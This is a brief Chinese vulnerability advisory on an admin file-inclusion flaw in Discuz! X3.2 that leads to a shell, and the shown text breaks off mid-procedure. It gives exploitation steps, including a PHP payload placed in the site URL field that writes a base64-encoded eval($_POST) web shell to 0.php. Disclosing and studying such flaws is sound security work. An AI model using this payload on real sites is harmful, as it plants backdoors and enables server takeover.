Discuz3.2后台文件包含漏洞可后台拿shell

- AV AC AU C I A
发布: 2025-04-13
修订: 2025-04-13

### 简要描述: 最新版本:Discuz! X3.2 Release 20140618 包括以前版本 ### 详细说明: 由于创建专题时未对 ``` 静态化名称 ``` 做任何限制引发此漏洞 1.全局->站点信息 网站 URL: http://www.comsenz.com/#<?php file_put_contents('0.php',base64_decode('PD9waHAgQGV2YWwoJF9QT1NUW2FdKTsgPz4='));?> [<img src="https://images.seebug.org/upload/201406/192353349f86a439f18b016b61d4f94c3a57ad64.jpg" alt="1.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201406/192353349f86a439f18b016b61d4f94c3a57ad64.jpg) 2.工具->更新缓存 [<img src="https://images.seebug.org/upload/201406/192354012759b20e4267a2e59035e3e990b87a67.jpg" alt="2.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201406/192354012759b20e4267a2e59035e3e990b87a67.jpg) 3.门户->HTML管理 静态文件扩展名: htm 专题HTML存放目录:data/cache [<img src="https://images.seebug.org/upload/201406/192354199f497eacfcb321e09bc57e513077f459.jpg" alt="3.jpg" width="600"...

0%
暂无可用Exp或PoC
当前有0条受影响产品信息